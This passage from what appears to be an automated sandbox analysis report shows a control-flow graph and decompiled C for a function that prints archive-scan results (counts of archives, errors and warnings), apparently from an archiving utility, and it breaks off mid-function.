                                                                                                    0x003e9aaa
                                                                                                    0x003e9aaf
                                                                                                    0x003e9ab6
                                                                                                    0x003e9abb
                                                                                                    0x003e9ac4
                                                                                                    0x003e9acc
                                                                                                    0x003e9acc
                                                                                                    0x003e9341
                                                                                                    0x003e991c
                                                                                                    0x003e9920
                                                                                                    0x003e9927
                                                                                                    0x003e992e
                                                                                                    0x003e9937
                                                                                                    0x003e993e
                                                                                                    0x003e9947
                                                                                                    0x003e9948
                                                                                                    0x003e994b
                                                                                                    0x003e9951
                                                                                                    0x003e9954
                                                                                                    0x003e9957
                                                                                                    0x003e995c
                                                                                                    0x003e9968
                                                                                                    0x003e996c
                                                                                                    0x003e9975
                                                                                                    0x003e997b
                                                                                                    0x003e997f
                                                                                                    0x003e9986
                                                                                                    0x003e998c
                                                                                                    0x003e9993
                                                                                                    0x003e9994
                                                                                                    0x003e9999
                                                                                                    0x003e99a0
                                                                                                    0x003e99a8
                                                                                                    0x003e99de
                                                                                                    0x003e99de
                                                                                                    0x003e99e1
                                                                                                    0x003e99e8
                                                                                                    0x003e99e8
                                                                                                    0x003e99ef
                                                                                                    0x003e99f3
                                                                                                    0x003e9a03
                                                                                                    0x003e9a16
                                                                                                    0x003e9a16
                                                                                                    0x003e9a1b
                                                                                                    0x00000000
                                                                                                    0x003e9a1b
                                                                                                    0x003e99e3
                                                                                                    0x003e99e6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e99e6
                                                                                                    0x003e99aa
                                                                                                    0x003e99ad
                                                                                                    0x003e99b4
                                                                                                    0x003e99b6
                                                                                                    0x003e99c6
                                                                                                    0x003e99d9
                                                                                                    0x00000000
                                                                                                    0x003e99d9
                                                                                                    0x003e99af
                                                                                                    0x003e99b2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e9347
                                                                                                    0x003e9347
                                                                                                    0x003e934c
                                                                                                    0x003e9352
                                                                                                    0x003e9355
                                                                                                    0x003e9357
                                                                                                    0x003e935b
                                                                                                    0x003e9368
                                                                                                    0x003e9368
                                                                                                    0x003e935d
                                                                                                    0x003e9364
                                                                                                    0x003e9364
                                                                                                    0x003e936c
                                                                                                    0x003e9370
                                                                                                    0x003e9373
                                                                                                    0x003e9378
                                                                                                    0x003e9378
                                                                                                    0x003e9381
                                                                                                    0x003e9387
                                                                                                    0x003e9394
                                                                                                    0x003e9398
                                                                                                    0x003e93bd
                                                                                                    0x003e93c9
                                                                                                    0x003e93d2
                                                                                                    0x003e93d8
                                                                                                    0x003e93dd
                                                                                                    0x003e93dd
                                                                                                    0x003e93de
                                                                                                    0x003e93de
                                                                                                    0x003e93ea
                                                                                                    0x003e93fb
                                                                                                    0x003e93fc
                                                                                                    0x003e9400
                                                                                                    0x003e9412
                                                                                                    0x003e9418
                                                                                                    0x003e941e
                                                                                                    0x003e9424
                                                                                                    0x003e942d
                                                                                                    0x003e9440
                                                                                                    0x003e9448
                                                                                                    0x003e9453
                                                                                                    0x003e9457
                                                                                                    0x003e9462
                                                                                                    0x003e9466
                                                                                                    0x003e9469
                                                                                                    0x003e9477
                                                                                                    0x003e9480
                                                                                                    0x003e9488
                                                                                                    0x003e9488
                                                                                                    0x003e9499
                                                                                                    0x003e949d
                                                                                                    0x003e94a0
                                                                                                    0x003e94a3
                                                                                                    0x003e94a8
                                                                                                    0x003e94b0
                                                                                                    0x003e94b1
                                                                                                    0x003e94b4
                                                                                                    0x003e94b6
                                                                                                    0x003e94c1
                                                                                                    0x003e94c5
                                                                                                    0x003e94c6
                                                                                                    0x003e94cd
                                                                                                    0x003e94d1
                                                                                                    0x003e94d8
                                                                                                    0x003e94df
                                                                                                    0x003e94ea
                                                                                                    0x003e94ed
                                                                                                    0x003e94f1
                                                                                                    0x003e94f4
                                                                                                    0x003e94f4
                                                                                                    0x003e94fc
                                                                                                    0x003e94fe
                                                                                                    0x003e9503
                                                                                                    0x003e9505
                                                                                                    0x003e9509
                                                                                                    0x003e950c
                                                                                                    0x003e951b
                                                                                                    0x003e9522
                                                                                                    0x003e952a
                                                                                                    0x003e9534
                                                                                                    0x003e9534
                                                                                                    0x003e953c
                                                                                                    0x003e953e
                                                                                                    0x003e953e
                                                                                                    0x003e953c
                                                                                                    0x003e9545
                                                                                                    0x003e954b
                                                                                                    0x003e9551
                                                                                                    0x003e9555
                                                                                                    0x003e9561
                                                                                                    0x003e9573
                                                                                                    0x003e9576
                                                                                                    0x003e958b
                                                                                                    0x003e9597
                                                                                                    0x003e95b0
                                                                                                    0x003e95b0
                                                                                                    0x003e9561
                                                                                                    0x003e95c1
                                                                                                    0x003e95c5
                                                                                                    0x003e95c9
                                                                                                    0x003e95d2
                                                                                                    0x003e95eb
                                                                                                    0x003e95eb
                                                                                                    0x003e95c9
                                                                                                    0x003e95fc
                                                                                                    0x003e962f
                                                                                                    0x003e9631
                                                                                                    0x003e9639
                                                                                                    0x003e9642
                                                                                                    0x003e964b
                                                                                                    0x003e964e
                                                                                                    0x003e9663
                                                                                                    0x003e9663
                                                                                                    0x003e9674
                                                                                                    0x003e9678
                                                                                                    0x003e9689
                                                                                                    0x003e9692
                                                                                                    0x003e96ab
                                                                                                    0x003e96ab
                                                                                                    0x003e9689
                                                                                                    0x003e9674
                                                                                                    0x00000000
                                                                                                    0x003e95fe
                                                                                                    0x003e9600
                                                                                                    0x003e9604
                                                                                                    0x003e96b0
                                                                                                    0x003e96bc
                                                                                                    0x003e9700
                                                                                                    0x003e9704
                                                                                                    0x003e970d
                                                                                                    0x003e970f
                                                                                                    0x003e98c6
                                                                                                    0x003e98cc
                                                                                                    0x003e98d8
                                                                                                    0x003e98e4
                                                                                                    0x003e98e8
                                                                                                    0x003e98f3
                                                                                                    0x003e98f7
                                                                                                    0x003e98fe
                                                                                                    0x003e9902
                                                                                                    0x003e990b
                                                                                                    0x003e990b
                                                                                                    0x00000000
                                                                                                    0x003e9902
                                                                                                    0x003e9721
                                                                                                    0x003e988a
                                                                                                    0x003e988c
                                                                                                    0x003e9897
                                                                                                    0x003e9897
                                                                                                    0x003e989d
                                                                                                    0x003e98a0
                                                                                                    0x003e98a9
                                                                                                    0x003e98ac
                                                                                                    0x003e98c1
                                                                                                    0x003e98c1
                                                                                                    0x00000000
                                                                                                    0x003e98a0
                                                                                                    0x003e972d
                                                                                                    0x003e9736
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e9740
                                                                                                    0x003e9746
                                                                                                    0x003e9754
                                                                                                    0x003e975d
                                                                                                    0x003e9776
                                                                                                    0x003e977b
                                                                                                    0x003e977b
                                                                                                    0x003e9788
                                                                                                    0x003e97ad
                                                                                                    0x003e97bf
                                                                                                    0x003e97c6
                                                                                                    0x003e97d4
                                                                                                    0x003e97dd
                                                                                                    0x003e97f3
                                                                                                    0x003e97ff
                                                                                                    0x003e9818
                                                                                                    0x003e9818
                                                                                                    0x003e97d4
                                                                                                    0x003e9824
                                                                                                    0x003e9836
                                                                                                    0x003e983d
                                                                                                    0x003e9840
                                                                                                    0x003e984f
                                                                                                    0x003e9862
                                                                                                    0x003e9869
                                                                                                    0x003e9872
                                                                                                    0x003e9876
                                                                                                    0x003e9883
                                                                                                    0x003e9883
                                                                                                    0x003e9872
                                                                                                    0x00000000
                                                                                                    0x003e9740
                                                                                                    0x003e9706
                                                                                                    0x003e9706
                                                                                                    0x00000000
                                                                                                    0x003e9706
                                                                                                    0x003e96c0
                                                                                                    0x003e96c4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e96c8
                                                                                                    0x003e96d9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e96e2
                                                                                                    0x003e96fb
                                                                                                    0x00000000
                                                                                                    0x003e96fb
                                                                                                    0x003e9611
                                                                                                    0x003e962a
                                                                                                    0x00000000
                                                                                                    0x003e962a
                                                                                                    0x003e95fc

                                                                                                    APIs
                                                                                                    • fputs.MSVCRT(Scanning the drive for archives:), ref: 003E9255
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputcfputs
                                                                                                    • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $XB$-"$S
                                                                                                    • API String ID: 269475090-1567277197
                                                                                                    • Opcode ID: 861d324ebb70139bf820fa1c903e6e3e7887eb94a5939e7b39997a04869ef810
                                                                                                    • Instruction ID: 231da7aca39948a6f8efa6e563c986ca02f9f793515110e57b3255d35f7ea64b
                                                                                                    • Opcode Fuzzy Hash: 861d324ebb70139bf820fa1c903e6e3e7887eb94a5939e7b39997a04869ef810
                                                                                                    • Instruction Fuzzy Hash: D8229E31900268DFDF27EBA5C855BEEFBB1AF44304F14429AE44A6B291DB746E84CF11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E8E2A Relevance: 56.7, APIs: 15, Strings: 17, Instructions: 690COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 204 3e8e2a-3e8e31 205 3e8e37-3e8e44 call 3c06da 204->205 206 3e9191-3e935b call 3ef23f call 3b1524 call 3ef23f call 3b1524 call 3b1e0c 204->206 211 3e8e4a-3e8e51 205->211 212 3e9045-3e904c 205->212 266 3e935d-3e9366 call 3e9f16 206->266 267 3e9368 206->267 216 3e8e6b-3e8ea0 call 3e80d3 211->216 217 3e8e53-3e8e59 211->217 214 3e917e-3e918c call 3ea37b 212->214 215 3e9052-3e9064 call 3ea312 212->215 232 3e9a3a-3e9a41 214->232 233 3e9066-3e906a 215->233 234 3e9070-3e9112 call 3d6b24 call 3b276e call 3b2690 call 3d29d4 call 3e9bb0 call 3b276e 215->234 230 3e8ea2-3e8ea8 216->230 231 3e8eb0 216->231 217->216 222 3e8e5b-3e8e66 call 3b302d 217->222 222->216 230->231 236 3e8eaa-3e8eae 230->236 237 3e8eb4-3e8ef5 call 3b2f2f call 3ea185 231->237 238 3e9a43-3e9a4a 232->238 239 3e9a51-3e9a7d call 3ea789 call 3b1e40 call 3d1eab 232->239 233->234 297 3e911a-3e9179 call 3ea4c7 call 3d0a72 call 3b1e40 * 2 call 3eae14 234->297 298 3e9114 234->298 236->237 262 3e8ef7-3e8efb 237->262 263 3e8f01-3e8f11 237->263 238->239 244 3e9a4c call 3ea7a4 238->244 272 3e9a7f-3e9a81 239->272 273 3e9a85-3e9acc call 3b1e40 call 3b11c2 call 3eac28 call 3d0a72 239->273 244->239 262->263 268 3e8f24 263->268 269 3e8f13-3e8f19 263->269 275 3e936a-3e9373 266->275 267->275 270 3e8f2b-3e8fc8 call 3b2f2f call 3d6b24 call 3e9bb0 call 3de64c 268->270 269->268 276 3e8f1b-3e8f22 269->276 315 3e8fca-3e8fd2 call 3eb5fa 270->315 316 3e8fd7-3e8fe0 270->316 272->273 281 3e937b-3e93d8 call 3b2f2f call 3ea093 275->281 282 3e9375-3e9377 275->282 276->270 300 3e93da-3e93de 281->300 301 3e93e4-3e9469 call 3e9b1d call 3ead5a call 3c2625 call 3b2d47 call 3d2fc1 281->301 282->281 297->232 298->297 300->301 341 3e948d-3e94ed call 3d0d11 301->341 342 3e946b-3e9488 call 3d23c0 call 3ea789 301->342 315->316 321 3e8fe8-3e903b call 3ea4c7 call 3d0a72 call 3b1e40 call 3eadc0 call 3e8222 316->321 322 3e8fe2 316->322 352 3e9040 321->352 322->321 350 3e94ef-3e94f4 call 3eb5fa 341->350 351 3e94f9-3e94fc 341->351 342->341 350->351 354 3e94fe-3e9505 351->354 355 3e9545-3e9551 351->355 352->232 358 3e9539-3e953c 354->358 359 3e9507-3e9534 call 3b1fa0 fputs call 3b1fa0 call 3b1fb3 call 3b1fa0 354->359 356 3e95b5-3e95c1 355->356 357 3e9553-3e9561 call 3b1fa0 355->357 360 3e95c3-3e95c9 356->360 361 3e95f0-3e95fc 356->361 371 3e956c-3e95b0 fputs call 3b2201 call 3b1fa0 fputs call 3b2201 call 3b1fa0 357->371 372 3e9563-3e956a 357->372 358->355 362 3e953e 358->362 359->358 360->361 365 3e95cb-3e95eb fputs call 3b2201 call 3b1fa0 360->365 367 3e95fe-3e9604 361->367 368 3e962f-3e9631 361->368 362->355 365->361 373 3e960a-3e962a fputs call 3b2201 call 3b1fa0 367->373 374 3e96b0-3e96bc 367->374 368->374 376 3e9633-3e9642 368->376 371->356 372->356 372->371 373->368 380 3e96be-3e96c4 374->380 381 3e9700-3e9704 374->381 383 3e9668-3e9674 376->383 384 3e9644-3e9663 fputs call 3b2201 call 3b1fa0 376->384 388 3e9706 380->388 392 3e96c6-3e96d9 call 3b1fa0 380->392 387 3e970d-3e970f 381->387 381->388 383->374 386 3e9676-3e9689 call 3b1fa0 383->386 384->383 386->374 412 3e968b-3e96ab fputs call 3b2201 call 3b1fa0 386->412 397 3e98c6-3e9902 call 3d302f call 3b1e40 call 3eaf20 call 3e9b99 387->397 398 3e9715-3e9721 387->398 388->387 392->388 411 3e96db-3e96fb fputs call 3b2201 call 3b1fa0 392->411 452 3e9908-3e990e 397->452 453 3e9a22-3e9a31 call 3d0a72 397->453 406 3e988a-3e98a0 call 3b1fa0 398->406 407 3e9727-3e9736 398->407 406->397 423 3e98a2-3e98c1 fputs call 3b2201 call 3b1fa0 406->423 407->406 414 3e973c-3e9740 407->414 411->381 412->374 414->397 420 3e9746-3e9754 414->420 427 3e9756-3e977b fputs call 3b2201 call 3b1fa0 420->427 428 3e9781-3e9788 420->428 423->397 427->428 429 3e978a-3e9791 428->429 430 3e97a6-3e97bf fputs call 3b2201 428->430 429->430 436 3e9793-3e9799 429->436 443 3e97c4-3e97d4 call 3b1fa0 430->443 436->430 441 3e979b-3e97a4 436->441 441->430 446 3e981d-3e9862 fputs call 3b2201 call 3b1fa0 fputs call 3b2201 441->446 443->446 456 3e97d6-3e9818 fputs call 3b2201 call 3b1fa0 fputs call 3b2201 call 3b1fa0 443->456 466 3e9867-3e9872 call 3b1fa0 446->466 452->453 453->232 462 3e9a35 call 3d0a72 453->462 456->446 462->232 466->397 473 3e9874-3e9888 call 3b1fa0 call 3e5f0e 466->473 473->397
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E003E8E2A(struct _IO_FILE** __ebx, intOrPtr __edi) {
				struct _IO_FILE** _t384;
				void* _t386;
				signed int _t387;
				intOrPtr* _t395;
				intOrPtr _t400;
				signed int _t411;
				signed int _t420;
				signed int _t424;
				signed int _t432;
				signed int _t444;
				void* _t460;
				void* _t465;
				signed int _t466;
				void* _t468;
				struct _IO_FILE** _t473;
				void* _t477;
				void* _t499;
				signed int _t526;
				signed int _t539;
				signed int _t569;
				signed int _t578;
				struct _IO_FILE** _t580;
				signed int _t581;
				signed int _t602;
				struct _IO_FILE** _t614;
				signed int _t778;
				signed int _t791;
				void* _t807;
				intOrPtr _t816;
				struct _IO_FILE** _t819;
				struct _IO_FILE** _t820;
				signed int _t823;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				void* _t828;

				_t816 = __edi;
				_t614 = __ebx;
				if( *((intOrPtr*)(_t828 - 0x2f8)) == 6) {
					 *((intOrPtr*)(_t828 - 0x78)) = 0;
					 *((intOrPtr*)(_t828 - 0x74)) = 0;
					 *((intOrPtr*)(_t828 - 0x70)) = 0;
					 *((intOrPtr*)(_t828 - 0x38)) = 0;
					 *((intOrPtr*)(_t828 - 0x34)) = 0;
					 *((intOrPtr*)(_t828 - 0x30)) = 0;
					__eflags =  *((char*)(_t828 - 0x33a));
					_t614 = fputs;
					 *(_t828 - 4) = 0xc;
					if(__eflags == 0) {
						_push(0xc8);
						E003E8134(_t828 - 0x43c, __eflags);
						 *((intOrPtr*)(_t828 - 0x44c)) = 0x42e058;
						_t384 =  *0x43a894;
						asm("sbb ecx, ecx");
						 *(_t828 - 4) = 0xd;
						 *(_t828 - 0x448) =  ~( *(_t828 - 0x338)) & _t384;
						 *(_t828 - 0x444) =  *0x43a898;
						 *(_t828 - 0x398) =  *(_t828 - 0x18);
						__eflags = _t384;
						 *((intOrPtr*)(_t828 - 0x390)) =  *(_t828 - 0x14) - 1;
						if(_t384 != 0) {
							__eflags =  *(_t828 - 0x338);
							if( *(_t828 - 0x338) != 0) {
								fputs("Scanning the drive for archives:",  *_t384); // executed
								E003B1FA0(_t384);
							}
						}
						_t135 = _t828 - 0x44c; // 0x42e058
						 *((intOrPtr*)(_t828 - 0xac)) = 0;
						 *((intOrPtr*)(_t828 - 0xa8)) = 0;
						 *((intOrPtr*)(_t828 - 0xa4)) = 0;
						 *((intOrPtr*)(_t828 - 0xa0)) = 0;
						 *((intOrPtr*)(_t828 - 0x9c)) = 0;
						 *((intOrPtr*)(_t828 - 0x98)) = 0;
						 *(_t828 - 0x94) = 0;
						 *(_t828 - 0x90) = 0;
						 *((intOrPtr*)(_t828 - 0x8c)) = 0;
						 *(_t828 - 0x88) = 0;
						 *(_t828 - 0x84) = 0;
						 *(_t828 - 0x80) = 0;
						E003E421A(_t135);
						_t386 = E003B2D47(_t828 - 0x60);
						_t149 = _t828 - 0x44c; // 0x42e058
						_push(_t828 - 0xac);
						_push(_t828 - 0x38);
						_push(_t828 - 0x78);
						_push(_t386);
						 *(_t828 - 4) = 0xe;
						_t387 = E003D0461(_t614, _t828 - 0x2cc, 0, 0, __eflags); // executed
						 *(_t828 - 0x20) = _t387;
						 *(_t828 - 4) = 0xd;
						E003B1E40(_t387,  *((intOrPtr*)(_t828 - 0x60)));
						__eflags =  *(_t828 - 0x398);
						if( *(_t828 - 0x398) != 0) {
							E003EB5FA(_t828 - 0x43c, 0, 1); // executed
						}
						__eflags =  *(_t828 - 0x20);
						if( *(_t828 - 0x20) == 0) {
							__eflags =  *(_t828 - 0x338);
							if( *(_t828 - 0x338) != 0) {
								_push(_t828 - 0xac); // executed
								E003E45B8(_t828 - 0x44c); // executed
							}
						}
						 *(_t828 - 4) = 0xc;
						E003EB561(_t828 - 0x43c);
						__eflags =  *(_t828 - 0x20);
						if( *(_t828 - 0x20) != 0) {
							L104:
							 *(_t828 - 4) = 0xb;
							E003D0A72(_t614, _t828 - 0x38);
							 *(_t828 - 4) = 8;
							E003D0A72(_t614, _t828 - 0x78);
							L105:
							if( *((char*)(_t828 - 0x334)) != 0 &&  *0x43a894 != 0) {
								E003EA7A4();
							}
							E003B1E40(E003EA789( *(_t828 - 0x20)),  *((intOrPtr*)(_t828 - 0xcc)));
							 *(_t828 - 4) = 6;
							L003D1EAB(_t828 - 0xc0);
							_t395 =  *((intOrPtr*)(_t828 - 0x2c));
							 *(_t828 - 4) = 4;
							_t845 = _t395;
							if(_t395 != 0) {
								_t395 =  *((intOrPtr*)( *_t395 + 8))(_t395);
							}
							 *(_t828 - 4) = 2;
							E003B1E40(_t395,  *((intOrPtr*)(_t828 - 0xdc)));
							E003B11C2(_t828 - 0x108);
							 *(_t828 - 4) =  *(_t828 - 4) & 0x00000000;
							E003EAC28(_t614, _t828 - 0x340, _t845);
							 *(_t828 - 4) =  *(_t828 - 4) | 0xffffffff;
							E003D0A72(_t614, _t828 - 0x6c);
							_t400 =  *((intOrPtr*)(_t828 - 0x28));
							 *[fs:0x0] =  *((intOrPtr*)(_t828 - 0xc));
							return _t400;
						} else {
							L38:
							__eflags =  *(_t828 - 0xd);
							if(__eflags == 0) {
								_push(_t828 - 0x5c);
								_push(_t828 - 0x50);
								_push(_t828 - 0x2a4);
								 *(_t828 - 0x24) =  *((intOrPtr*)(_t828 - 0x308));
								_push(_t828 - 0x2e4);
								 *((char*)(_t828 - 0x23)) =  *((intOrPtr*)(_t828 - 0x307));
								_push(_t828 - 0x2e8);
								 *(_t828 - 0x50) = 0;
								_push( *((intOrPtr*)(_t828 - 0x335)));
								 *(_t828 - 0x4c) = 0;
								 *(_t828 - 0x5c) = 0;
								 *(_t828 - 0x58) = 0;
								_push( *(_t828 - 0x338));
								_push( *((intOrPtr*)( *((intOrPtr*)(_t828 - 0x314)))) + 0xc);
								_push( *((intOrPtr*)(_t828 - 0x331)));
								_push( *((intOrPtr*)(_t828 - 0x270)));
								_push(_t828 - 0x38);
								_push(_t828 - 0x78);
								_push( *((intOrPtr*)(_t828 - 0x33a)));
								_push(_t828 - 0xcc);
								_push(_t828 - 0xc0);
								_t411 = L003E74FD(_t828 - 0x24,  *((intOrPtr*)(_t828 - 0x2c)), __eflags);
								__eflags =  *(_t828 - 0x338);
								 *(_t828 - 0x20) = _t411;
								if( *(_t828 - 0x338) == 0) {
									L99:
									__eflags =  *(_t828 - 0x4c);
									if( *(_t828 - 0x4c) > 0) {
										L101:
										__eflags =  *(_t828 - 0x338);
										if( *(_t828 - 0x338) != 0) {
											E003B1FA0(0x43a5b0);
											 *_t614("Errors: ",  *0x43a5b0);
											E003B1FA0(E003B2201(0x43a5b0,  *(_t828 - 0x50),  *(_t828 - 0x4c)));
										}
										 *((intOrPtr*)(_t828 - 0x28)) = 2;
										goto L104;
									}
									__eflags =  *(_t828 - 0x50);
									if( *(_t828 - 0x50) <= 0) {
										goto L104;
									}
									goto L101;
								}
								__eflags =  *(_t828 - 0x58);
								if( *(_t828 - 0x58) > 0) {
									L98:
									E003B1FA0(0x43a5b0);
									 *_t614("Warnings: ",  *0x43a5b0);
									E003B1FA0(E003B2201(0x43a5b0,  *(_t828 - 0x5c),  *(_t828 - 0x58)));
									goto L99;
								}
								__eflags =  *(_t828 - 0x5c);
								if( *(_t828 - 0x5c) <= 0) {
									goto L99;
								}
								goto L98;
							}
							_push(0x170);
							_t420 = E003B1E0C();
							 *(_t828 - 0x58) = _t420;
							__eflags = _t420;
							 *(_t828 - 4) = 0xf;
							if(__eflags == 0) {
								_t823 = 0;
								__eflags = 0;
							} else {
								_t823 = L003E9F16(_t420, __eflags);
							}
							__eflags = _t823;
							 *(_t828 - 4) = 0xc;
							 *(_t828 - 0x58) = _t823;
							if(_t823 != 0) {
								 *((intOrPtr*)( *_t823 + 4))(_t823);
							}
							_t174 = _t823 + 0xdc; // 0xdc
							 *((char*)(_t823 + 0xda)) =  *((intOrPtr*)(_t828 - 0x2e8));
							 *(_t828 - 4) = 0x10;
							E003B2F2F(_t174, _t828 - 0x2e4);
							_t424 = E003EA093(_t823,  *0x43a894,  *0x43a898,  *(_t828 - 0x18));
							__eflags =  *((intOrPtr*)(_t828 - 0x74)) - 1;
							__eflags =  *(_t828 - 0x18);
							 *((char*)(_t823 + 0xd9)) = _t424 & 0xffffff00 |  *((intOrPtr*)(_t828 - 0x74)) - 0x00000001 > 0x00000000;
							 *((intOrPtr*)(_t823 + 0x168)) =  *((intOrPtr*)(_t828 - 0x114));
							 *(_t823 + 0x164) =  *(_t828 - 0x1c);
							if(__eflags != 0) {
								_t539 =  *(_t828 - 0x14) - 1;
								__eflags = _t539;
								 *(_t823 + 0xc4) = _t539;
							}
							L003E9B1D(_t828 - 0x38c, __eflags);
							_push(_t828 - 0x298);
							 *(_t828 - 4) = 0x11;
							E003EAD5A(_t828 - 0x38c);
							__eflags =  *((intOrPtr*)(_t828 - 0x2f8)) - 3;
							 *((char*)(_t828 - 0x350)) =  *((intOrPtr*)(_t828 - 0x33a));
							_t432 =  *((intOrPtr*)(_t828 - 0x337));
							 *(_t828 - 0x34e) = _t432;
							 *(_t828 - 0x34f) = _t432;
							 *((char*)(_t828 - 0x34d)) = _t432 & 0xffffff00 |  *((intOrPtr*)(_t828 - 0x2f8)) == 0x00000003;
							E003C2625(_t828 - 0x34c, _t828 - 0x2a4);
							E003B2D47(_t828 - 0x54);
							 *(_t828 - 4) = 0x12;
							E003D2FC1(_t828 - 0x3ec);
							__eflags =  *(_t828 - 0x2d4);
							 *(_t828 - 4) = 0x13;
							 *(_t828 - 0x1c) = 0;
							if( *(_t828 - 0x2d4) != 0) {
								 *(_t828 - 0x1c) = _t828 - 0x3ec;
								_push(_t828 - 0x2d8);
								E003EA789(E003D23C0(_t828 - 0x3ec));
							}
							_push(_t828 - 0xb4);
							_push(_t828 - 0x54);
							_push( *(_t828 - 0x1c));
							_t219 = _t823 + 4; // 0x4
							asm("sbb ecx, ecx");
							_push(_t823);
							_push( ~_t823 & _t219);
							asm("sbb edx, edx");
							_t220 = _t823 + 0x10; // 0x10
							_push( ~_t823 & _t220);
							_push(_t828 - 0x38c);
							_push( *((intOrPtr*)( *((intOrPtr*)(_t828 - 0x314)))) + 0xc);
							_push(_t828 - 0x38);
							_push(_t828 - 0x78);
							_push(_t828 - 0xcc);
							_t444 = E003D0D11( *((intOrPtr*)(_t828 - 0x2c)), _t828 - 0xc0); // executed
							__eflags =  *(_t823 + 0xbc);
							 *(_t828 - 0x20) = _t444;
							if( *(_t823 + 0xbc) != 0) {
								_t229 = _t823 + 0x18; // 0x18
								E003EB5FA(_t229, 0, 1);
							}
							__eflags =  *(_t828 - 0x50);
							if( *(_t828 - 0x50) != 0) {
								_t526 =  *0x43a898; // 0x43a5a0
								__eflags = _t526;
								if(__eflags != 0) {
									 *(_t828 - 0x14) = _t526;
									E003B1FA0(_t526);
									fputs("ERROR:",  *( *(_t828 - 0x14)));
									E003B1FA0( *(_t828 - 0x14));
									_push( *((intOrPtr*)(_t828 - 0x54)));
									E003B1FA0(L003B1FB3( *(_t828 - 0x14), __eflags));
								}
								__eflags =  *(_t828 - 0x20);
								if( *(_t828 - 0x20) == 0) {
									 *(_t828 - 0x20) = 0x80004005;
								}
							}
							_t819 =  *0x43a894; // 0x43a5b0
							 *(_t828 - 0xd) =  *(_t828 - 0xd) & 0x00000000;
							__eflags = _t819;
							if(_t819 == 0) {
								L59:
								__eflags =  *(_t823 + 0x128) |  *(_t823 + 0x12c);
								if(( *(_t823 + 0x128) |  *(_t823 + 0x12c)) != 0) {
									__eflags = _t819;
									 *(_t828 - 0xd) = 1;
									if(_t819 != 0) {
										fputs("Can\'t open as archive: ",  *_t819);
										E003B1FA0(E003B2201(_t819,  *(_t823 + 0x128),  *(_t823 + 0x12c)));
									}
								}
								__eflags =  *(_t823 + 0x130) |  *(_t823 + 0x134);
								if(( *(_t823 + 0x130) |  *(_t823 + 0x134)) == 0) {
									L65:
									__eflags = _t819;
									if(_t819 != 0) {
										_t257 = _t823 + 0x138; // 0x138
										_t499 = _t257;
										__eflags =  *(_t823 + 0x138) |  *(_t499 + 4);
										if(( *(_t823 + 0x138) |  *(_t499 + 4)) != 0) {
											fputs("Archives with Warnings: ",  *_t819);
											_t259 = _t823 + 0x138; // 0x138
											E003B1FA0(E003B2201(_t819,  *_t259,  *((intOrPtr*)(_t259 + 4))));
										}
										__eflags =  *(_t823 + 0x148) |  *(_t823 + 0x14c);
										if(( *(_t823 + 0x148) |  *(_t823 + 0x14c)) != 0) {
											E003B1FA0(_t819);
											__eflags =  *(_t823 + 0x148) |  *(_t823 + 0x14c);
											if(( *(_t823 + 0x148) |  *(_t823 + 0x14c)) != 0) {
												fputs("Warnings: ",  *_t819);
												E003B1FA0(E003B2201(_t819,  *(_t823 + 0x148),  *(_t823 + 0x14c)));
											}
										}
									}
									goto L71;
								} else {
									__eflags = _t819;
									 *(_t828 - 0xd) = 1;
									if(_t819 == 0) {
										L71:
										__eflags =  *(_t823 + 0x140) |  *(_t823 + 0x144);
										if(( *(_t823 + 0x140) |  *(_t823 + 0x144)) == 0) {
											L75:
											__eflags =  *(_t828 - 0xd);
											if( *(_t828 - 0xd) == 0) {
												L77:
												__eflags = _t819;
												if(_t819 == 0) {
													L93:
													 *(_t828 - 4) = 0x12;
													E003B1E40(E003D302F(_t828 - 0x3ec),  *((intOrPtr*)(_t828 - 0x54)));
													 *(_t828 - 4) = 0x14;
													E003EAF20(_t828 - 0x34c);
													 *(_t828 - 4) = 0x10;
													L003E9B99(_t828 - 0x38c);
													__eflags = _t823;
													 *(_t828 - 4) = 0xc;
													if(_t823 != 0) {
														 *((intOrPtr*)( *_t823 + 8))(_t823);
													}
													goto L104;
												}
												__eflags =  *(_t823 + 0x130) |  *(_t823 + 0x134);
												if(( *(_t823 + 0x130) |  *(_t823 + 0x134)) != 0) {
													L91:
													E003B1FA0(_t819);
													_t310 = _t823 + 0x150; // 0x150
													_t460 = _t310;
													__eflags =  *(_t823 + 0x150) |  *(_t460 + 4);
													if(( *(_t823 + 0x150) |  *(_t460 + 4)) != 0) {
														fputs("Sub items Errors: ",  *_t819);
														_t312 = _t823 + 0x150; // 0x150
														E003B1FA0(E003B2201(_t819,  *_t312,  *((intOrPtr*)(_t312 + 4))));
													}
													goto L93;
												}
												_t279 = _t823 + 0x150; // 0x150
												_t465 = _t279;
												__eflags =  *(_t823 + 0x150) |  *(_t465 + 4);
												if(( *(_t823 + 0x150) |  *(_t465 + 4)) != 0) {
													goto L91;
												}
												__eflags =  *(_t828 - 0x20);
